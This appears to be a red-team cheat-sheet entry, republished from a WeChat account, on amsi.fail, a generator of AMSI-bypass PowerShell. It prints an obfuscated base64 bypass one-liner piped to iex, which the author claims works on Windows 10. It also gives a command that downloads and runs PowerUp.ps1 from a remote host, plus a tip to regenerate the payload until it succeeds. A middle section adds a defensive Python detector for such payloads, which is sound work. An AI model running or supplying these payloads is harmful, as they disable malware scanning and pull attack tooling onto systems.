0-Introduction
[OSCP essential] [OSEP essential] [Hands-on essential]
amsi.fail is a go-to tool for bypassing AMSI.
1-Name
https://amsi.fail/
2-Source
https://github.com/Flangvik/AMSI.fail
3-Usage
Open https://amsi.fail/ and click "Generate Encoded" to produce an encoded PowerShell script; run it on the target machine to bypass AMSI. Below is an example, personally tested and working on Windows 10:
[sySTem.tEXT.enCodinG]::UniCodE.gEtSTriNg([SySTEM.COnVeRT]::FROmBASe64StrING("IwBNAGEAdAB0ACA
ARwByAGEAZQBiAGUAcgBzACAAcwBlAGMAbwBuAGQAIABSAGUAZgBsAGUAYwB0AGkAbwBuACAAbQBlAHQAaABvAGQAIAAKACQAcwBiAE0AVQBGAF8AcAB0ADY
AYQBoAHoAZABQAHAAMQBsAEUAQQA9ACQAbgB1AGwAbAA7ACQAXwBPAF8AegA5ADIAbQBhAHEARABBAFYAVwA2AE4AdwA9ACIAUwB5AHMAdABlAG0ALgAkACg
AKAAnAE0A4ABuAOEAZwDqACcAKwAnAG0A6QBuAHQAJwApAC4AbgBvAHIATQBBAEwAaQBaAGUAKABbAEMASABBAHIAXQAoAFsAQgBZAHQARQBdADAAeAA0ADY
AKQArAFsAQwBoAEEAUgBdACgAMQAxADEAKgA1ADUALwA1ADUAKQArAFsAYwBIAEEAUgBdACgAMQAxADQAKwA2ADAALQA2ADAAKQArAFsAQwBIAEEAcgBdACg
AOQAzACsAMQA2ACkAKwBbAGMAaABhAHIAXQAoADYAOAApACkAIAAtAHIAZQBwAGwAYQBjAGUAIABbAEMAaABhAHIAXQAoAFsAQgB5AHQARQBdADAAeAA1AGM
AKQArAFsAQwBIAGEAUgBdACgAMQAxADIAKQArAFsAQwBIAGEAUgBdACgAMQAyADMAKQArAFsAQwBIAEEAUgBdACgAMQAxACsANgA2ACkAKwBbAEMAaABBAHI
AXQAoADEAMQAwACkAKwBbAEMAaABBAFIAXQAoAFsAYgBZAFQARQBdADAAeAA3AGQAKQApAC4AJAAoACgAJwDAAPsAdAD1ACcAKwAnAG0A4gB0AO0AJwArACc
A9ABuACcAKQAuAG4AbwByAE0AYQBsAEkAWgBlACgAWwBDAGgAQQByAF0AKABbAGIAWQB0AGUAXQAwAHgANAA2ACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQ
ARQBdADAAeAA2AGYAKQArAFsAQwBIAEEAUgBdACgAWwBCAFkAdABlAF0AMAB4ADcAMgApACsAWwBDAGgAYQByAF0AKAA0ADYAKwA2ADMAKQArAFsAYwBoAEE
AcgBdACgANgA4ACoAMQA0AC8AMQA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAQwBIAGEAcgBdACgAWwBCAFkAVABFAF0AMAB4ADUAYwApACsAWwBjAEg
AQQByAF0AKABbAEIAeQB0AEUAXQAwAHgANwAwACkAKwBbAGMASABBAFIAXQAoAFsAQgB5AFQARQBdADAAeAA3AGIAKQArAFsAQwBoAGEAcgBdACgAWwBCAFk
AdABlAF0AMAB4ADQAZAApACsAWwBDAEgAQQBSAF0AKAA1ACsAMQAwADUAKQArAFsAYwBIAGEAcgBdACgAWwBCAHkAdABFAF0AMAB4ADcAZAApACkALgAkACg
AWwBDAGgAYQBSAF0AKAAxADAAKwA1ADUAKQArAFsAQwBIAEEAUgBdACgAMQAwADkAKwA4ADkALQA4ADkAKQArAFsAYwBIAEEAUgBdACgAWwBiAFkAdABFAF0
AMAB4ADcAMwApACsAWwBDAEgAQQByAF0AKABbAEIAWQB0AEUAXQAwAHgANgA5ACkAKwBbAEMASABBAHIAXQAoAFsAYgBZAFQAZQBdADAAeAA1ADUAKQArAFs
AYwBIAEEAUgBdACgANAA0ACsANwAyACkAKwBbAGMAaABBAHIAXQAoAFsAYgB5AFQARQBdADAAeAA2ADkAKQArAFsAQwBoAEEAcgBdACgAWwBCAHkAVABFAF0
AMAB4ADYAYwApACsAWwBDAEgAYQBSAF0AKAA2ADkAKwA0ADYAKQApACIAOwAkAHIAdgBwAHQAegBqAGQAdwB2AG4AeAB1AHQAagBxAHkAbwBiAGYAcAB2AD0
AIgArACgAJwDpACcAKwAnAOwAJwArACcAYgAnACkALgBuAE8AUgBtAEEAbABJAHoAZQAoAFsAYwBoAEEAUgBdACgANwAwACoANQA4AC8ANQA4ACkAKwBbAEM
ASABBAHIAXQAoADQAOQArADYAMgApACsAWwBDAGgAQQByAF0AKAA3ADQAKwA0ADAAKQArAFsAQwBoAEEAcgBdACgAWwBiAHkAdABlAF0AMAB4ADYAZAApACs
AWwBjAEgAQQByAF0AKAA2ADgAKwA5AC0AOQApACkAIAAtAHIAZQBwAGwAYQBjAGUAIABbAEMASABBAHIAXQAoADMANgArADUANgApACsAWwBDAEgAYQBSAF0
AKABbAGIAWQB0AGUAXQAwAHgANwAwACkAKwBbAGMASABBAHIAXQAoAFsAQgB5AFQAZQBdADAAeAA3AGIAKQArAFsAQwBoAEEAUgBdACgANwA3ACsAMwAxAC0
AMwAxACkAKwBbAEMASABhAFIAXQAoADEAMQAwACsANQA0AC0ANQA0ACkAKwBbAGMASABhAHIAXQAoADEAMgA1ACsANAAwAC0ANAAwACkAIgA7AFsAVABoAHI
AZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBTAGwAZQBlAHAAKAAxADQANwA2ACkAOwBbAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFM
AZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAKAAiACQAKAAoACcAVwByAO4AdAAnACsAJwDqAM0AbgB0ACcAKwAnADMAMgAnACkALgBOAG8
AcgBNAEEAbABpAFoAZQAoAFsAQwBIAGEAcgBdACgANwAwACkAKwBbAGMASABBAFIAXQAoADEAMQAxACkAKwBbAEMAaABhAFIAXQAoAFsAQgBZAFQAZQBdADA
AeAA3ADIAKQArAFsAQwBIAEEAcgBdACgAWwBiAHkAdABFAF0AMAB4ADYAZAApACsAWwBjAGgAYQBSAF0AKABbAGIAeQB0AEUAXQAwAHgANAA0ACkAKQAgAC0
AcgBlAHAAbABhAGMAZQAgAFsAYwBIAEEAcgBdACgANAA0ACsANAA4ACkAKwBbAEMASABhAHIAXQAoADEAMQAyACsAMwAwAC0AMwAwACkAKwBbAEMAaABhAHI
AXQAoADEAMgAzACoANQA4AC8ANQA4ACkAKwBbAGMASABBAHIAXQAoADUANQArADIAMgApACsAWwBjAGgAQQByAF0AKABbAEIAeQB0AEUAXQAwAHgANgBlACk
AKwBbAEMASABBAHIAXQAoAFsAYgB5AFQAZQBdADAAeAA3AGQAKQApACIAKQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGU
AKAAkAF8ATwBfAHoAOQAyAG0AYQBxAEQAQQBWAFcANgBOAHcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAQwBIAEEAUgBdACgAWwBiAHkAdABFAF0
AMAB4ADYAMQApACsAWwBjAGgAYQByAF0AKAAxADAAOQArADcANwAtADcANwApACsAWwBDAGgAYQBSAF0AKABbAGIAeQB0AEUAXQAwAHgANwAzACkAKwBbAEM
ASABhAHIAXQAoADEAMAA1ACkAKwBbAGMASABhAHIAXQAoAFsAYgB5AHQARQBdADAAeAA0ADMAKQArAFsAQwBIAGEAcgBdACgAMQAxADEAKQArAFsAYwBIAEE
AcgBdACgAWwBiAFkAVABlAF0AMAB4ADYAZQApACsAWwBjAGgAQQByAF0AKAAxADEANgArADIANwAtADIANwApACsAWwBDAEgAQQByAF0AKAAxADAAMQArADQ
AOAAtADQAOAApACsAWwBDAEgAYQBSAF0AKAAxADIAMAArADMANwAtADMANwApACsAWwBjAEgAQQByAF0AKABbAGIAWQB0AEUAXQAwAHgANwA0ACkAKQAiACw
AWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQAiAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAIgApAC4
ARwBlAHQAVgBhAGwAdQBlACgAJABzAGIATQBVAEYAXwBwAHQANgBhAGgAegBkAFAAcAAxAGwARQBBACkALAAwAHgAMgBjADUAYQAzADAAZAA0ACkAOwAkAGg
AYgBuAHEAcgBuAGMAYwBrAGIAYQB1AGQAYQB6AHgAYgBsAGIAdgBoAG0AYgBkAGcAZwBvAG0APQAiACsAKAAnAHMAbgBzACcAKwAnAHgAcgB5ACcAKQAuAG4
ATwByAG0AQQBMAEkAWgBFACgAWwBjAGgAYQByAF0AKABbAEIAWQBUAEUAXQAwAHgANAA2ACkAKwBbAGMASABBAHIAXQAoADEAMQAxACoAMgAxAC8AMgAxACk
AKwBbAGMAaABhAFIAXQAoAFsAQgBZAHQARQBdADAAeAA3ADIAKQArAFsAQwBIAEEAcgBdACgAWwBiAHkAVABlAF0AMAB4ADYAZAApACsAWwBDAEgAYQBSAF0
AKABbAGIAWQB0AEUAXQAwAHgANAA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAQwBIAEEAUgBdACgAWwBCAHkAdABFAF0AMAB4ADUAYwApACsAWwBDAEg
AQQByAF0AKAAzADUAKwA3ADcAKQArAFsAYwBIAEEAcgBdACgAMQAxADAAKwAxADMAKQArAFsAYwBIAGEAUgBdACgANgArADcAMQApACsAWwBjAEgAYQBSAF0
AKABbAGIAWQB0AGUAXQAwAHgANgBlACkAKwBbAGMAaABBAFIAXQAoAFsAYgBZAHQAZQBdADAAeAA3AGQAKQAiADsAWwBUAGgAcgBlAGEAZABpAG4AZwAuAFQ
AaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADEANgA5ADQAKQA="))|iex
Anything executed afterwards then runs with AMSI bypassed:
iex ((New-Object System.Net.WebClient).DownloadString("http://192.168.136.131/PowerUp.ps1"))
Invoke-AllChecks
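From the defender's side, the envelope above is the part that is stable across every payload the generator emits: a UTF-16LE script, base64-encoded, decoded in memory and piped to iex, while the identifiers inside are rebuilt from [char] arithmetic or written with diacritics and normalized back to ASCII, so keyword matching on the raw command line finds no "amsi" at all. The following Python is an added example, not code from the page or from the AMSI.fail project. It takes a command line as an analyst would see it in a process-creation or script-block log, decodes the inner script and reports the structural indicators that survive the obfuscation. The regexes, indicator list, verdict levels and both fixture scripts are this example's own assumptions; the suspicious fixture only mimics the shape of the page's decoded payload with placeholder type and field names and is not a working bypass.

```python
import base64
import re

# Envelope used by the page's one-liner: a UTF-16LE script, base64-encoded, decoded in
# memory with Unicode.GetString(FromBase64String(...)) and piped to iex. Case-insensitive
# because the generator randomises the casing of every cmdlet and type name.
ENVELOPE_RE = re.compile(
    r"Unicode\.GetString\(\s*\[[\w.]*Convert\]::FromBase64String\(\s*"
    r"[\"']([A-Za-z0-9+/=\s]+)[\"']\s*\)\s*\)",
    re.IGNORECASE,
)
PIPE_TO_IEX_RE = re.compile(r"\|\s*(?:iex|Invoke-Expression)\b", re.IGNORECASE)

# Structural fragments of the decoded page payload ("Matt Graebers second Reflection
# method"): reflection into a non-public static field of a loaded .NET assembly.
# Assumed indicator list for this example; tune it to your own telemetry.
REFLECTION_INDICATORS = (
    "[Ref].Assembly.GetType",
    ".GetField(",
    "NonPublic,Static",
    ".GetValue(",
    "Runtime.InteropServices.Marshal",
)
# Obfuscation the generator applies to identifiers: build them from [char] arithmetic,
# or write them with diacritics and strip those again via Normalize('FormD') -replace.
CHAR_ARITH_RE = re.compile(r"\[char\]\s*\(", re.IGNORECASE)
NORMALIZE_RE = re.compile(r"\.Normalize\(.*?\)\s*-replace", re.IGNORECASE | re.DOTALL)


def decode_unicode_base64(blob):
    """Decode a base64 UTF-16LE blob; whitespace is ignored just as FromBase64String does."""
    compact = re.sub(r"\s+", "", blob)
    try:
        raw = base64.b64decode(compact, validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(command_line):
    """Pull the encoded script out of a logged command line and list what it contains."""
    result = {"envelope": False, "piped_to_iex": False, "decoded": None, "indicators": []}
    m = ENVELOPE_RE.search(command_line)
    if not m:
        return result
    result["envelope"] = True
    result["piped_to_iex"] = bool(PIPE_TO_IEX_RE.search(command_line))
    decoded = decode_unicode_base64(m.group(1))
    result["decoded"] = decoded
    if decoded is None:
        return result
    lowered = decoded.lower()
    for fragment in REFLECTION_INDICATORS:
        if fragment.lower() in lowered:
            result["indicators"].append(fragment)
    if CHAR_ARITH_RE.search(decoded):
        result["indicators"].append("identifiers built from [char] arithmetic")
    if NORMALIZE_RE.search(decoded):
        result["indicators"].append("Normalize() -replace identifier de-obfuscation")
    return result


def verdict(command_line):
    """'high': encoded script piped to iex that reflects into non-public members;
    'medium': any encoded script piped to iex; 'low': no such envelope at all."""
    r = analyze(command_line)
    if r["envelope"] and r["piped_to_iex"] and r["indicators"]:
        return "high"
    if r["envelope"] and r["piped_to_iex"]:
        return "medium"
    return "low"


def make_envelope(script):
    """Wrap a script in the same envelope as the page's one-liner (used here only to build fixtures)."""
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return '[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("%s"))|iex' % blob


# Constructed fixtures (not taken from the page). The first mimics the shape of the page's
# decoded payload with placeholder type and field names; it is not a working bypass.
SUSPICIOUS_INNER = (
    "# constructed fixture\n"
    "$n=('Cönstructed.'+'Plácehölder').Normalize([char](70)+[char](111)+[char](114)+[char](109)+[char](68))"
    " -replace '\\p{Mn}';"
    "[Ref].Assembly.GetType($n).GetField('placeholderField',"
    "[Reflection.BindingFlags]'NonPublic,Static').GetValue($null)"
)
BENIGN_INNER = "Get-Date; Get-Process | Select-Object -First 3"
SUSPICIOUS_CMD = make_envelope(SUSPICIOUS_INNER)
BENIGN_CMD = make_envelope(BENIGN_INNER)

if __name__ == "__main__":
    for name, cmd in (("suspicious", SUSPICIOUS_CMD), ("benign", BENIGN_CMD)):
        r = analyze(cmd)
        print(name, verdict(cmd), r["indicators"])
```

The decoder strips whitespace before decoding, so the one-liner exactly as it is wrapped on this page (line breaks inside the base64 string) decodes the same way PowerShell would. Note that the verdict rests on the reflection and de-obfuscation structure, not on the word "amsi": the whole point of the generator is that the obvious keyword never appears in the bytes on the wire. Where PowerShell Script Block Logging (event 4104) is enabled, the decoded script is also recorded at execution time, which gives a second place to apply the same indicator check.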
4-Real-world case
Loading PowerUp is blocked:
iex ((New-Object System.Net.WebClient).DownloadString("http://192.168.136.131/PowerUp.ps1"))
Generate the AMSI bypass command and execute it:
https://amsi.fail/
Result: AMSI is completely bypassed.
Exam tip:
The code from https://amsi.fail/ does not succeed in bypassing every time; if it fails, simply generate another one and run it again.
Originally published on the WeChat public account 高级红队专家: Hacker Arsenal | AMSI.fail perfectly bypasses AMSI